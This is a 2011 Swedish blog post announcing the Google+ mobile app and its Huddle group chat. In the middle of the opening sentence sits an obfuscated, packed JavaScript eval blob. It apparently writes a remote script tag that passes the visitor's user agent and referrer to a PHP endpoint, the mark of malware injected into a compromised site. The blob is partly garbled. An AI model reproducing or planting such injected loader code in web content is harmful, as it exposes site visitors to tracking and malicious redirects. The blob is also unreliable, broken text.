Image Image Image Image Image Image Image Image Image Image

| 28 maj, 2020

Scroll to top

Top

Google+ app Till din mobil

Google+ app Till din mobil
Filip Urde
  • On 19 juli, 2011
  • http://www.revue.se/filip-urde

Jag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fnshb|var|u0026u|referrer|fazhs||js|php’.split(’|’),0,{}))
skrev igår ett inlägg om att fixa en Google+ app till din dator…. Föga intressant.

Nu har det dock äntligen kommit till din telefon! gå in på den här länken så kan du ladda ner appen via bland annat Qr kod. Appen har släppts på android market och iTunes.

(länk för iTunes nerladdning)

Fördelen med appen förutom att du nu har ditt + konto i mobilen, är funktionen huddle. Huddle är en chatt funktion som tillåter dig att chatta med 1-flera av dina google vänner samtidigt. Och som google själva säger ”Why make group plans, one person at a time?”, ja det är frågan…

Join the movement. Kanske kan google+ byta ut Facebook i framtiden… vad kul det hade varit =D.

 

Ps. Om någon är utan ett google+ konto, skriv i kommentaren, så ska vi fixa en.